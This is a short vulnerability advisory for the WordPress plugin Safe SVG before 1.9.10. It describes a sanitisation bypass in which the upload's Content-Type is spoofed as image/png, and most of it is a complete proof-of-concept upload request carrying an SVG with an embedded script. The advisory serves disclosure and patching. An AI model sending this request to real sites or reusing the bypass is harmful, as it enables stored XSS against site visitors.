Safe SVG < 1.9.10 - SVG Sanitisation Bypass

2022-03-2500:00:00

David Hamann

0.001 Low

EPSS

Percentile

36.9%

JSON

The sanitisation step of the plugin can be bypassed by spoofing the content-type in the POST request to upload a file. Exploiting this vulnerability, an attacker will be able to perform the kinds of attacks that this plugin should prevent (mainly XSS, but depending on further use of uploaded SVG files potentially other XML attacks).

POST /wp-admin/async-upload.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------27451310545300823063986174174
Content-Length: 947
Connection: close
Cookie: [user with upload capability]

-----------------------------27451310545300823063986174174
Content-Disposition: form-data; name="name"

xss.svg
-----------------------------27451310545300823063986174174
Content-Disposition: form-data; name="action"

upload-attachment
-----------------------------27451310545300823063986174174
Content-Disposition: form-data; name="_wpnonce"

b281e72731
-----------------------------27451310545300823063986174174
Content-Disposition: form-data; name="async-upload"; filename="xss.svg"
Content-Type: image/png

<?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">alert(/XSS/);</script>
</svg>

-----------------------------27451310545300823063986174174--

References

github.com/10up/safe-svg/pull/28

0.001 Low

EPSS

Percentile

36.9%

JSON

Related for WPEX-ID:4D12533E-BDB7-411F-BCDF-4C5046DB13F3